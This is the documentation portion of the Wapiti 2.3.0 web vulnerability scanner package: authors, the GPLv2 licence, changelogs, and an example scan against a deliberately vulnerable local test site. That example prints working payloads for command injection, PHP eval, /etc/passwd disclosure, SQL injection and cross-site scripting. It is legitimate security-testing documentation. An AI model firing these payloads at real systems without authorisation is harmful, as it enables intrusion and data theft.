r = session.post(url, data=form[1], headers=txheaders, allow_redirects=True)

jc.addcookies(session.cookies)
jc.dump()
jc.close()

wapiti-2.3.0+dfsg/doc/AUTHORS

Main Developer - Nicolas Surribas
http://devloop.users.sourceforge.net/
http://wapiti.sourceforge.net/

A Special thanks to the following people for the work on the version 2.3.0 :
* David del Pozo (spanish translations)
* Alberto Pastor (spanish translations)
* Mattia Barbon (bugfixing and testing)
* Le Gnou & Ecirbaf from www.gimp-attitude.org (new logo)
* int23h (german translations)
* Sindhu Kumar (malaysian translations and Windows testing)

wapiti-2.3.0+dfsg/doc/COPYING

                    GNU GENERAL PUBLIC LICENSE
                       Version 2, June 1991

Copyright (C) 1989, 1991 Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed.

                            Preamble

The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This General Public License applies to most of the Free Software Foundation's software and to any other program whose authors commit to using it. (Some other Free Software Foundation software is covered by the GNU Lesser General Public License instead.) You can apply it to your programs, too.

When we speak of free software, we are referring to freedom, not price.
Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do these things. To protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the software, or if you modify it. For example, if you distribute copies of such a program, whether gratis or for a fee, you must give the recipients all the rights that you have. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. We protect your rights with two steps: (1) copyright the software, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the software. Also, for each author's protection and ours, we want to make certain that everyone understands that there is no warranty for this free software. If the software is modified by someone else and passed on, we want its recipients to know that what they have is not the original, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that redistributors of a free program will individually obtain patent licenses, in effect making the program proprietary. To prevent this, we have made it clear that any patent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying, distribution and modification follow. GNU GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. 
This License applies to any program or other work which contains a notice placed by the copyright holder saying it may be distributed under the terms of this General Public License. The "Program", below, refers to any such program or work, and a "work based on the Program" means either the Program or any derivative work under copyright law: that is to say, a work containing the Program or a portion of it, either verbatim or with modifications and/or translated into another language. (Hereinafter, translation is included without limitation in the term "modification".) Each licensee is addressed as "you". Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running the Program is not restricted, and the output from the Program is covered only if its contents constitute a work based on the Program (independent of having been made by running the Program). Whether that is true depends on what the Program does. 1. You may copy and distribute verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and give any other recipients of the Program a copy of this License along with the Program. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Program or any portion of it, thus forming a work based on the Program, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) You must cause the modified files to carry prominent notices stating that you changed the files and the date of any change. 
b) You must cause any work that you distribute or publish, that in whole or in part contains or is derived from the Program or any part thereof, to be licensed as a whole at no charge to all third parties under the terms of this License. c) If the modified program normally reads commands interactively when run, you must cause it, when started running for such interactive use in the most ordinary way, to print or display an announcement including an appropriate copyright notice and a notice that there is no warranty (or else, saying that you provide a warranty) and that users may redistribute the program under these conditions, and telling the user how to view a copy of this License. (Exception: if the Program itself is interactive but does not normally print such an announcement, your work based on the Program is not required to print an announcement.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Program, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Program, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Program. In addition, mere aggregation of another work not based on the Program with the Program (or with a work based on the Program) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. 
You may copy and distribute the Program (or a work based on it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you also do one of the following: a) Accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, b) Accompany it with a written offer, valid for at least three years, to give any third party, for a charge no more than your cost of physically performing source distribution, a complete machine-readable copy of the corresponding source code, to be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange; or, c) Accompany it with the information you received as to the offer to distribute corresponding source code. (This alternative is allowed only for noncommercial distribution and only if you received the program in object code or executable form with such an offer, in accord with Subsection b above.) The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. 
If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code, even though third parties are not compelled to copy the source along with the object code. 4. You may not copy, modify, sublicense, or distribute the Program except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense or distribute the Program is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 5. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Program or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Program (or any work based on the Program), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Program or works based on it. 6. Each time you redistribute the Program (or any work based on the Program), the recipient automatically receives a license from the original licensor to copy, distribute or modify the Program subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties to this License. 7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. 
If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system, which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 8. If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Program under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 9. 
The Free Software Foundation may publish revised and/or new versions of the General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of this License, you may choose any version ever published by the Free Software Foundation. 10. If you wish to incorporate parts of the Program into other free programs whose distribution conditions are different, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 12. 
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Programs If you develop a new program, and you want it to be of the greatest possible use to the public, the best way to achieve this is to make it free software which everyone can redistribute and change under these terms. To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. Copyright (C) This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. Also add information on how to contact you by electronic and paper mail. 
If the program is interactive, make it output a short notice like this when it starts in an interactive mode: Gnomovision version 69, Copyright (C) year name of author Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details. The hypothetical commands `show w' and `show c' should show the appropriate parts of the General Public License. Of course, the commands you use may be called something other than `show w' and `show c'; they could even be mouse-clicks or menu items--whatever suits your program. You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the program, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the program `Gnomovision' (which makes passes at compilers) written by James Hacker. , 1 April 1989 Ty Coon, President of Vice This General Public License does not permit incorporating your program into proprietary programs. If your program is a subroutine library, you may consider it more useful to permit linking proprietary applications with the library. If this is what you want to do, use the GNU Lesser General Public License instead of this License.
wapiti-2.3.0+dfsg/doc/ChangeLog_Wapiti000066400000000000000000000203641240201516300175630ustar00rootroot00000000000000
20/10/2013
    Version 2.3.0
    Fixed a colosseum of bugs, especially related to unicode.
    Software is much more stable.
    New report template for HTML (using Kube CSS).
    Using v2.1.5 of Nikto database for mod_nikto.
    Replaced httplib2 with (python-)requests for everything related to HTTP.
    Remove BeautifulSoup from package. It is still required however.
    Core rewrite (PEP8 + more Pythonic)
    New payloads for the backup, XSS, blind SQL, exec and file modules + more detection rules.
    So many improvements on lswww (crawler) that I can't make a list here. But Wapiti reached 48% on Wivet.
    Wapiti cookie format is now based on JSON.
    Removed SOCKS proxy support (you will have to use a HTTP to SOCKS proxy).
    Added a HTTPResource class for easier module creation.
    Code restructuring for better setup.
    Attack of parameters in query string even for HTTP POST requests.
    Attack on file uploads (injection in file names).
    Simpler (and less buggy) colored output with -c.
    A CURL PoC is given for each vulnerability/anomaly found + raw HTTP request representation in reports.
    No more parameter reordering + can handle parameters repetition.
    Added a JSON report generator + fixed the HTML report generator.
    Added an option to not check SSL certificates.
    mod_xss : noscript tag escaping.
    Can work on parameters that don't have a value in query string.
    mod_crlf is not activated by default anymore (must call it with -m).
    Starting URLs (-s) will be fetched even if out of scope.
    Proxy support for wapiti-getcookie and wapiti-cookie.
    Attempt to bring an OpenVAS report generator.
    Added a home-made SWF parser to extract URLs from flash files.
    Added a home-made (and more than basic) JS interpreter based on the pynarcissus parser. A lot of work still needs to be done on this.
    New logo and webpage at wapiti.sf.net.
    Added German and Malaysian translations.
    Added a script to create standalone archive for Windows (with py2exe).

29/12/2009
    Version 2.2.1 (already)
    Bugfixes only
    Fixed a bug in lswww if root url is not given complete.
    Fixed a bug in lswww with a call to BeautifulSoup made on non text files.
    Fixed a bug that occurred when verbosity = 2. Unicode error on stderr.
    Check the document's content-type and extension before attacking files on the query string.
    Added a timeout check in the nikto module when downloading the database.

28/12/2009
    Version 2.2.0
    Added a manpage.
    Internationalization : translations of Wapiti in Spanish and French.
    Options -k and -i allow the scan to be saved and restored later.
    Added option -b to set the scope of the scan based on the root url given.
    Wrote a library to handle cookies and save them in XML format.
    Modules are now loaded dynamically with a dependency system.
    Rewrote the -m option used to activate / deactivate attack modules.
    New module to search for backup files of scripts on the target webserver.
    New module to search for weakly configured .htaccess.
    New module to search dangerous files based on the Nikto database.
    Differentiate "raw" XSS from "urlencoded" XSS.
    Updated BeautifulSoup to version 3.0.8.
    Better encoding support for webpages (convert to Unicode)
    Added "resource consumption" as a vulnerability type.
    Fixed bug ID 2779441 "Python Version 2.5 required?"
    Fixed bug with special characters in HTML reports.

05/04/2008
    Added more patterns for file handling vulnerabilities in PHP.
    Added GET_SQL and POST_SQL as modules (-m) for attacks.
    Modified getcookie.py and cookie.py so they try to get the cookies even if cookielib fails.

27/03/2007
    Updated ChangeLogs

26/03/2009
    Fixed bug ID 2433127. Comparison was made with HTTP error codes on numeric values but httplib2 returns the status code as a string.
    Forbid httplib2 to handle HTTP redirections. Wapiti and lswww will take care of this (more checks on urls...)
    Fixed a bug with Blind SQL attacks (the same attack could be launched several times)
    Fixed an error in blindSQLPayloads.txt.
    Changed the error message when Wapiti doesn't get any data from lswww.
    Verifications to be sure blind SQL attacks won't be launched if "standard" SQL attacks work.

25/03/2009
    Exported blind SQL payloads from the code. Now in config file blindSQLPayloads.txt.
    Set timeout for time-based BSQL attacks to timeout used for HTTP requests + 1 second.
    Added Blind SQL as a type of vulnerability in the report generator.
    More verbosity for permanent XSS scan.
    More docstrings.
    Updated the README.

24/03/2009
    Added some docstring to the code.
    Removed warning on alpha code.
    First Blind SQL Injection implementation in Wapiti.
    Fixed some timeout errors.

22/03/2009
    Fixed character encoding error in sql injection module.
    Changed the md5 and sha1 import in httplib2 to hashlib.

28/11/2008
    Google Charts API is added to generate the charts of the reports.

15/11/2008
    Re-integration of standard HTTP proxies in httplib2.
    Integration of HTTP CONNECT tunneling in Wapiti.
    Fixed bug ID 2257654 "getcookie.py error missing action in html form"

02/11/2008
    Integrated the proxy implementation of httplib2 in Wapiti.
    Can now use SOCKSv5 and SOCKSv4 proxies.

22/10/2008
    Fixed a bug with Cookie headers.

19/10/2008
    Replaced urllib2 by httplib2.
    Wapiti now uses persistent HTTP connections, speeding up the scan.
    Included a python SOCKS library.

09/10/2008
    Version 2.0.0-beta
    Added the possibility to generate reports of the vulnerabilities found in HTML, XML or plain-text format. See options -o and -f.
    HTTP authentication now works.
    Added the option -n (or --nice) to prevent endless loops during scanning.
    More patterns for SQL vulnerability detection
    Code refactoring : more clear and more object-oriented
    New XSS function is now fully implemented
    The payloads have been separated from the code into configuration files.
    Updated BeautifulSoup

15/09/2008
    Version 1.1.7-alpha
    Use GET method if not specified in "method" tag
    Keep a history of XSS payloads
    New XSS engine for GET method using a list of payloads to bypass filters
    New module HTTP.py for http requests
    Added fpassthru to file handling warnings
    Added a new detection string for MS-SQL, submitted by Joe McCray

28/01/2007
    Version 1.1.6
    New version of lswww

24/10/2006
    Version 1.1.5
    Wildcard exclusion with -x (--exclude) option

22/10/2006
    Fixed a typo in wapiti.py (setAuthCreddentials : one 'd' is enough)
    Fixed a bug with setAuthCredentials.

07/10/2006
    Version 1.1.4
    Some modifications have been made on getcookie.py so it can work on Webmin (and probably more web applications)
    Added -t (--timeout) option to set the timeout in seconds
    Added -v (--verbose) option to set the verbosity. Three available modes :
        0: only print found vulnerabilities
        1: print current attacked urls (existing urls)
        2: print every attack payload and url (a lot of information... good for debugging)
    Wapiti is much more modular and comes with some functions to set scan and attack options... look at the code ;)
    Some default options are available as "modules" with option -m (--module) :
        GET_XSS: only scan for XSS with HTTP GET method (no post)
        POST_XSS: XSS attacks using POST and not GET
        GET_ALL: every attack without POST requests

12/08/2006
    Version 1.1.3
    Fixed the timeout bug with chunked responses (ID = 1536565 on SourceForge)

09/08/2006
    Version 1.1.2
    Fixed a bug with HTTP 500 and POST attacks

05/08/2006
    Version 1.1.1
    Fixed the UnboundLocalError due to socket timeouts (bug ID = 1534415 on SourceForge)

27/07/2006
    Version 1.1.0 with urllib2
    Detection string for mysql_error()
    Changed the mysql payload (see http://shiflett.org/archive/184 )
    Modification of the README file

22/07/2006
    Added CRLF Injection.

20/07/2006
    Added LDAP Injection and Command Execution (eval, system, passthru...)

11/07/2006
    -r (--remove) option to remove parameters from URLs
    Support for Basic HTTP Auth added but doesn't work with Python 2.4.
    Proxy support.
    Now use cookie files (option "-c file" or "--cookie file")
    -u (--underline) option to highlight vulnerable parameter in URL
    Detect more vulnerabilities.

04/07/2006:
    Now attacks scripts using QUERY_STRING as a parameter (i.e. http://server/script?attackme)

23/06/2006:
    Version 1.0.1
    Can now use cookies !! (use -c var=data or --cookie var=data)
    Two utilities added : getcookie.py (interactive) and cookie.py (command line) to get a cookie.
    Now on SourceForge

25/04/2006:
    Version 1.0.0
wapiti-2.3.0+dfsg/doc/ChangeLog_lswww000066400000000000000000000121531240201516300175060ustar00rootroot00000000000000
29/12/2009
    Version 2.3.1
    Fixed a bug in lswww if root url is not given complete.
    Fixed a bug in lswww with a call to BeautifulSoup made on non text files.
    Fixed a bug that occurred when verbosity = 2. Unicode error on stderr.

27/12/2009
    Version 2.3.0
    Internationalization and translation to English and Spanish when called from Wapiti.
    Ability to save a scan session and restore it later (-i)
    Added option -b to set the scope of the scan based on the root url given as argument.
    Fixed bug ID 2779441 "Python Version 2.5 required?"
    Use a home-made cookie library instead of urllib2's one.
    Keep additional information on the webpages (headers + encoding)
    Use BeautifulSoup to detect webpage encoding and handle parsing errors.
    Fixed a bug when "a href" or "form action" have an empty string as value.
    Better support of Unicode.

26/03/2009
    Version 2.2.0
    Fixed bug ID 2433127 with HTTP 404 error codes.
    Don't let httplib2 manage HTTP redirections : return the status code and let lswww handle the new url.

25/03/2009
    Version 2.1.9
    Added option -e (or --export)
    Saves urls and forms data to an XML file.
    We hope other fuzzers will allow importation of this file.

24/03/2009
    More verifications on timeout errors.

22/03/2009
    Version 2.1.8
    Fixed bug ID: 2415094
    Check on protocol found in hyperlinks was case-sensitive. Moved it to non-case-sensitive.
    Integration of a second linkParser class called linkParser2 from lswwwv2.py. This parser uses only regexp to extract links and forms.

25/11/2008
    httplib2 uses lowercase names for the HTTP headers in opposition to urllib2 (first letter was uppercase). Changed the verifications on headers.

15/11/2008
    Fixed a bug with links going to parent directory.

02/11/2008
    Better integration of proxy support provided by httplib2. It's now possible to use SOCKS proxies.
19/10/2008
    Version 2.1.7
    Now use httplib2 (http://code.google.com/p/httplib2/), MIT licence, instead of urllib2.
    The ability to use persistent connections makes the scan faster.

09/10/2008
    Version 2.1.6
    HTTP authentication now works
    Added the option -n (or --nice) to prevent endless loops during scanning

28/01/2007
    Version 2.1.5
    First take a look at the Content-Type instead of the document extension
    Added BeautifulSoup as an optional module to correct bad html documents (better use tidy if you can)

24/10/2006
    Version 2.1.4
    Wildcard exclusion with -x (--exclude) option

22/10/2006
    Fixed an error with url parameters handling that appeared in the previous version.
    Fixed a typo in lswww.py (setAuthCreddentials : one 'd' is enough)

07/10/2006
    Version 2.1.3
    Three verbose modes with -v (--verbose) option
        0: print only results
        1: print dots for each page accessed (default mode)
        2: print each found url during scan
    Timeout in seconds can be set with -t (--timeout) option
    Fixed bug "crash when no content-type is returned"
    Fixed an error with 404 webpages
    Fixed a bug when the only parameter of an url is a forbidden one

09/08/2006
    Version 2.1.2
    Fixed a bug with regular expressions

05/08/2006
    Version 2.1.1
    Remove redundant slashes from urls (e.g. http://server/dir//page.php converted to http://server/dir/page.php)

20/07/2006
    Version 2.1.0 with urllib2

11/07/2006
    -r (--remove) option to remove parameters from URLs
    Generate URL with GET forms instead of using POST by default
    Support for Basic HTTP Auth added but doesn't work with Python 2.4.
    Now use cookie files (option "-c file" or "--cookie file")
    Extracts links from Location header fields

06/07/2006
    Extract links from "Location:" headers (HTTP 301 and 302)
    Default type for "input" elements is set to "text" (as written in the HTML 4.0 specifications)
    Added "search" in input types (created for Safari browsers)

04/07/2006
    Fixed a bug with empty parameters tuples (convert http://server/page?&a=2 to http://server/page?a=2)

23/06/2006
    Version 2.0.1
    Take care of the "submit" type
    No extra data sent when a page contains several forms
    Corrected a bug with urls finishing by '?'
    Support Cookies !!

25/04/2006
    Version 2.0
    Forms are extracted as a list of tuples, each containing a string (url of the target script) and a dict holding the field names and their default value (or 'true' if empty)
    Lists the scripts that handle uploads
    Can now be used as a module

19/04/2006
    Version 1.1
    Case-insensitive tag parsing
    Ctrl+C handling to stop the program cleanly
    Extraction of urls from form tags (action)

12/10/2005
    Version 1.0
    Handling of links that are syntactically valid but point to nonexistent resources (404)

11/09/2005
    Beta4
    Use of the getopt module, which makes it easy to specify the urls to visit first, the urls to exclude (new!) or the proxy to use

24/08/2005
    Beta3
    Added a timeout when reading pages so as not to hang on a buggy script

23/08/2005
    Version beta2
    Support for indexes generated by Apache
    Protocol filtering
    Handling of links that go up the directory tree
    Handling of empty links

02/08/2005
    Release of beta1
wapiti-2.3.0+dfsg/doc/cookie.ico000066400000000000000000013226261240201516300164500ustar00rootroot00000000000000
wapiti-2.3.0+dfsg/doc/example.txt

First, I use wapiti-getcookie to log in to the restricted area and get the cookie in cookies.json:

bash-4.2$ python bin/wapiti-getcookie /tmp/cookies.json http://127.0.0.1/vuln/login.php
Please enter values for the following form:
url = http://127.0.0.1/vuln/login.php
username (default) : admin
password (letmein) : secret

It can also be done with wapiti-cookie this way:
python bin/wapiti-cookie /tmp/cookies.json http://127.0.0.1/vuln/login.php username=admin password=secret

Then, I scan the vulnerable website using the cookie and excluding the logout script:

bash-4.2$ wapiti http://127.0.0.1/vuln/ -c cookies.json -x http://127.0.0.1/vuln/logout.php

Wapiti-2.3.0 (wapiti.sourceforge.net)

 Note
========
This scan has been saved in the file /home/audit/.wapiti/scans/127.0.0.1.xml
You can use it to perform attacks without scanning again the web site with the "-k" parameter
[*] Loading modules:
	 mod_crlf, mod_exec, mod_file, mod_sql, mod_xss, mod_backup, mod_htaccess, mod_blindsql, mod_permanentxss, mod_nikto

[+] Launching module exec
Command execution in http://127.0.0.1/vuln/exec/system.php via injection in the parameter host
  Evil url: http://127.0.0.1/vuln/exec/system.php?host=%3Benv
Command execution in http://127.0.0.1/vuln/exec/passthru.php via injection in the parameter host
  Evil url: http://127.0.0.1/vuln/exec/passthru.php?host=%3Benv
Timeout occured in http://127.0.0.1/vuln/exec/shell_exec.php
  Evil url: http://127.0.0.1/vuln/exec/shell_exec.php?host=a%60sleep%20600%60
Received a HTTP 500 error in http://127.0.0.1/vuln/exec/eval.php
  Evil url: http://127.0.0.1/vuln/exec/eval.php?code=%3Benv
PHP evaluation in http://127.0.0.1/vuln/exec/eval.php via injection in the parameter code
  Evil url: http://127.0.0.1/vuln/exec/eval.php?code=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F

[+] Launching module file
Received a HTTP 500 error in http://127.0.0.1/vuln/exec/eval.php
  Evil url: http://127.0.0.1/vuln/exec/eval.php?code=%2Fetc%2Fpasswd
Linux local file disclosure vulnerability in http://127.0.0.1/vuln/include/include_get_simple.php via injection in the parameter f
  Evil url: http://127.0.0.1/vuln/include/include_get_simple.php?f=%2Fetc%2Fpasswd
File disclosure vulnerability in include_path in http://127.0.0.1/vuln/include/readfile_get_simple.php via injection in the parameter f
  Evil url: http://127.0.0.1/vuln/include/readfile_get_simple.php?f=.depdb
Linux local file disclosure vulnerability in http://127.0.0.1/vuln/include/include_get_post_conditional.php?id=2 via injection in the parameter f
  Evil request:
    POST /vuln/include/include_get_post_conditional.php?id=2 HTTP/1.1
    Host: 127.0.0.1
    Referer: http://127.0.0.1/vuln/include/include_get_post_conditional.php?id=2
    Content-Type: application/x-www-form-urlencoded

    f=%2Fetc%2Fpasswd

[+] Launching module sql
Received a HTTP 500 error in http://127.0.0.1/vuln/exec/eval.php
  Evil url: http://127.0.0.1/vuln/exec/eval.php?code=%BF%27%22%28
MySQL Injection in http://127.0.0.1/vuln/sql/login.php via injection in the parameter login
  Evil url: http://127.0.0.1/vuln/sql/login.php?login=%BF%27%22%28&password=test
MySQL Injection in http://127.0.0.1/vuln/sql/login.php via injection in the parameter password
  Evil url: http://127.0.0.1/vuln/sql/login.php?login=test&password=%BF%27%22%28
MySQL Injection in http://127.0.0.1/vuln/sql/login_post.php via injection in the parameter login
  Evil request:
    POST /vuln/sql/login_post.php HTTP/1.1
    Host: 127.0.0.1
    Referer: http://127.0.0.1/vuln/sql/login_post.php
    Content-Type: application/x-www-form-urlencoded

    login=%BF%27%22%28&password=letmein
MySQL Injection in http://127.0.0.1/vuln/sql/login_post.php via injection in the parameter password
  Evil request:
    POST /vuln/sql/login_post.php HTTP/1.1
    Host: 127.0.0.1
    Referer: http://127.0.0.1/vuln/sql/login_post.php
    Content-Type: application/x-www-form-urlencoded

    login=default&password=%BF%27%22%28

[+] Launching module xss
XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_get.php via injection in the parameter vuln
  Evil url: http://127.0.0.1/vuln/xss/xss_in_get.php?firstname=James&vuln=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%27w3xanau7e6%27%29%3C%2Fscript%3E&lastname=Bond
XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_get_text_script.php via injection in the parameter vuln
  Evil url: http://127.0.0.1/vuln/xss/xss_in_get_text_script.php?vuln=String.fromCharCode%280%2Cwv503afd6b%2C1%29
XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_get_noscript.php via injection in the parameter vuln
  Evil url: http://127.0.0.1/vuln/xss/xss_in_get_noscript.php?vuln=%3C%2Ftextarea%3E%3C%2Fp%3E%3C%2Fdiv%3E%3C%2Fnoscript%3E%3Cscript%3Ealert%28%27wfalvx3r3y%27%29%3C%2Fscript%3E
XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_get_if_cond.php via injection in the parameter vuln
  Evil url: http://127.0.0.1/vuln/xss/xss_in_get_if_cond.php?vuln=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%27wjl4df7rtf%27%29%3C%2Fscript%3E&id=2
XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_query_string.php via injection in the query string
  Evil url: http://127.0.0.1/vuln/xss/xss_in_query_string.php?%3Cscript%3Ealert%28%27w1jnjlqhnq%27%29%3C%2Fscript%3E
XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_php_self.php via injection in the resource path
  Evil url: http://127.0.0.1/vuln/xss/xss_in_php_self.php/%3Cscript%3Ephpselfxss()%3C/script%3E
XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php via injection in the parameter vuln
  Evil url: http://127.0.0.1/vuln/xss/permanent_xss_in_get_direct.php?firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27wrb6hruotv%27%29%3C%2Fscript%3E
XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_post.php via injection in the parameter vuln
  Evil request:
    POST /vuln/xss/xss_in_post.php HTTP/1.1
    Host: 127.0.0.1
    Referer: http://127.0.0.1/vuln/xss/xss_in_post.php
    Content-Type: application/x-www-form-urlencoded

    firstname=James&lastname=Bond&vuln=%3C%2Ftextarea%3E%3Cscript%3Ealert%28%27w1f181ucnr%27%29%3C%2Fscript%3E
XSS vulnerability in http://127.0.0.1/vuln/xss/permanent_xss_in_post_direct.php via injection in the parameter vuln
  Evil request:
    POST /vuln/xss/permanent_xss_in_post_direct.php HTTP/1.1
    Host: 127.0.0.1
    Referer: http://127.0.0.1/vuln/xss/permanent_xss_in_post_direct.php
    Content-Type: application/x-www-form-urlencoded

    firstname=James&lastname=Bond&vuln=%3Cscript%3Ealert%28%27wz00qm40jx%27%29%3C%2Fscript%3E
XSS vulnerability in http://127.0.0.1/vuln/xss/xss_in_post_url.php?style=%22%3E%3C%2Fdiv%3E%3Cscript%3Ealert%28%27wpk5q4ybjo%27%29%3C%2Fscript%3E via injection in the parameter style
  Evil request:
    POST /vuln/xss/xss_in_post_url.php?style=%22%3E%3C%2Fdiv%3E%3Cscript%3Ealert%28%27wpk5q4ybjo%27%29%3C%2Fscript%3E HTTP/1.1
    Host: 127.0.0.1
    Referer: http://127.0.0.1/vuln/xss/xss_in_post_url.php
    Content-Type: application/x-www-form-urlencoded

    username=Enter%20your%20username

[+] Launching module blindsql
